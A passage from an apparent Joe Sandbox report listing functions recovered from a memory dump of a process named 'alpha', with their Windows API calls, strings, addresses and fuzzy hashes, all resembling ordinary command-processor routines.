                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                      • String ID:
                                                      • API String ID: 1826527819-0
                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction ID: d4a4e73356d4e9d5c7dbfef9c40d17cc312ba0178867650c8d9b58e6aa1ba63f
                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction Fuzzy Hash: 7B015B31D086828AE708FB14E8463B8FA60FB8A756FC4A272D54F42395CFBC9044C762
                                                      Function 00007FF7E1DC3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 1464828906-0
                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction ID: 76a66d34887542013583b6698710f7e4e74c860733a02fc8b4b6020e6b31f2fe
                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction Fuzzy Hash: 47312562E0861186E724EF15A00227EF660FB95B80FD48636DA4A433D0EEBDE845C752
                                                      Function 00007FF7E1DBCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                      • API String ID: 2221118986-3416068913
                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction ID: c5bbe789aa92e062867f0b19c12af857f8324bbe20e35514066c1a948cae41e0
                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction Fuzzy Hash: C211EC21B0874281EF54EB15E1463BA9250EF44BA4FD84333DE6E477D5DE7CD0808361
                                                      Function 00007FF7E1DBBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcschr
                                                      • String ID: 2$COMSPEC
                                                      • API String ID: 1764819092-1738800741
                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction ID: 551e4d2b5a574d57db68f67059a82539fb13773ec96c674970ccebef499d4380
                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction Fuzzy Hash: 17519062E0864665FB64FB25A443779A391BF44784FC84033DA4F866E5DEFCE8408763
                                                      Function 00007FF7E1DC2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 4254246844-0
                                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                      • Instruction ID: 7f0706e067ea587e5421b703a0f6d6cfad5861e52a6cf91a1bc5c54f58284b71
                                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                      • Instruction Fuzzy Hash: FA41B662A0C74696EF10EF01E446379EBA0EF85B80FC54932D94D47784DEBCE441C7A2
                                                      Function 00007FF7E1DC498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                      • String ID:
                                                      • API String ID: 2643372051-0
                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction ID: 057bb0f319481f7d1869f57c90cecc99223403de147e35276248c35a7a42a83b
                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction Fuzzy Hash: D9F02662A09B4281EB04FB25F402274EAE0FF4D7A0BC58236C93E43390CFBC80408251
                                                      Function 00007FF7E1DC5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleMode
                                                      • String ID:
                                                      • API String ID: 1591002910-0
                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction ID: 216e250ae6028ed110bb4dc2e752556e834848768ba7dcd4d40c82de3a7cc494
                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction Fuzzy Hash: F1F07A35E09612DBE708EB11E846278BBA0FB8D712F849176C90E43318DFBDA6158B52
                                                      Function 00007FF7E1DC291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DriveType
                                                      • String ID: :
                                                      • API String ID: 338552980-336475711
                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction ID: b48dd3106c801b34b5690048f068c129aba883d9bf9a6e9cffd87956715695bb
                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction Fuzzy Hash: 17E0E56361860086D720DB60E05216AF760FB8D348FC41535DA8D83724DB3CC149CF08
                                                      Function 00007FF7E1DC5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF7E1DC5B52
                                                        • Part of subcall function 00007FF7E1DC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4297
                                                        • Part of subcall function 00007FF7E1DC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC42D7
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC42FD
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC4368
                                                        • Part of subcall function 00007FF7E1DC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4380
                                                        • Part of subcall function 00007FF7E1DC4224: wcsrchr.MSVCRT ref: 00007FF7E1DC43E6
                                                        • Part of subcall function 00007FF7E1DC4224: lstrcmpW.KERNELBASE ref: 00007FF7E1DC4401
                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7E1DC5BC7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                      • String ID:
                                                      • API String ID: 497088868-0
                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction ID: edc33e9e8be908d7abf96c7fe26e3ee58fdd66b423c3ae8458e08e92c3e1645d
                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction Fuzzy Hash: 86318660B0C64252EB24F711A4527BDE251FF89B80FC45533E94E87B95DEBCE501C751
                                                      Function 00007FF7E1DC3A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindClose.KERNELBASE(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                      • Instruction ID: c8b5453b1c63f017124b129981859bc0cfd8525adc06bba8e176699ac133d0d3
                                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                      • Instruction Fuzzy Hash: 8C01D620E08A87A5E754E719A541376E7A0FF88B40BD0D832D50DC2244DEBCF5A1C791
                                                      Function 00007FF7E1DC9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                      • String ID:
                                                      • API String ID: 1412018758-0
                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction ID: c141a1231c0784de808bbc5dc15d594d55d3f3aa7a6d97349a80aab13a6c33dc
                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction Fuzzy Hash: B9E06D01F0920B91FF1CBBA668433B592505F18B41E981832DD0E45382EEBCA092C3B2
                                                      Function 00007FF7E1DBCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction ID: e5378ca871b63f4bd2260f7fbee4b83aaaac386cbc538f7548cc47fa8c93c057
                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction Fuzzy Hash: 3DF08171E1864292EB04EB05F842279FBA0FB89B00BD99436D90E03358DF7CE451CB21
                                                      Function 00007FF7E1DC4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: exit
                                                      • String ID:
                                                      • API String ID: 2483651598-0
                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction ID: 3b7111ea554a2566a935c7083ea295116cedc959218ebbbb6273de37de37a98d
                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction Fuzzy Hash: 62C01230B0464687EB2DB731655213995A55B08201F445839C50781291DEBCD404C651
                                                      Function 00007FF7E1DC5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DefaultUser
                                                      • String ID:
                                                      • API String ID: 3358694519-0
                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction ID: 6a13f1da88f1832a94415aa2d532eca9800ca3ee00203dc3715e58e649fc3df6
                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction Fuzzy Hash: A7E0C2E2E282538AF7587E4160833B49953CB78782FC44833C60D812C54A7D3841D62A
                                                      Function 00007FF7E1DC2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
